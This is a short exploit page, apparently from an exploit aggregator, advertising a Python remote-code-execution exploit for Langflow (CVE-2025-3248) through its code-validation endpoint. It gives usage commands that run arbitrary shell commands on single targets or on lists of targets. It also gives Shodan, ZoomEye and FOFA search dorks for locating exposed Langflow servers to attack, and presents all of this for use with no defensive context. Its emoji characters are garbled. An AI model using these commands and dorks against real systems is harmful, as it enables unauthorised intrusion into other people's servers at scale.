Share
## https://sploitus.com/exploit?id=38CE1CAF-BF08-52D8-91A3-AE6E545881F8
# CVE-2025-3248 โ Langflow RCE Exploit
Remote Code Execution (RCE) exploit for **Langflow** applications vulnerable to **CVE-2025-3248**.
- **Affected Endpoint:** `/api/v1/validate/code`
---
## ๐ Exploit Features
- ๐ Remote & unauthenticated RCE
- ๐ No authentication required
- ๐ Python3 one-liner script
- ๐จ Colorized terminal output for clarity
---
## ๐ง Usage
```bash
python3 langflow_rce.py -u http://target:7860 -c "id"
python3 langflow_rce.py -i target.txt -c "id"
python3 langflow_rce.py -i target.txt -c "id" -p http://127.0.0.1:8080
```
## Dork
```
Shodan:
http.title:"Langflow" "Langflow allows you to build LLM applications"
title:"Langflow"
ZoomEye:
title:"Langflow" && body:"Langflow allows you to build LLM applications"
app:"Langflow"
FOFA:
title="Langflow" && body="Langflow allows you to build LLM applications"
app="Langflow"
```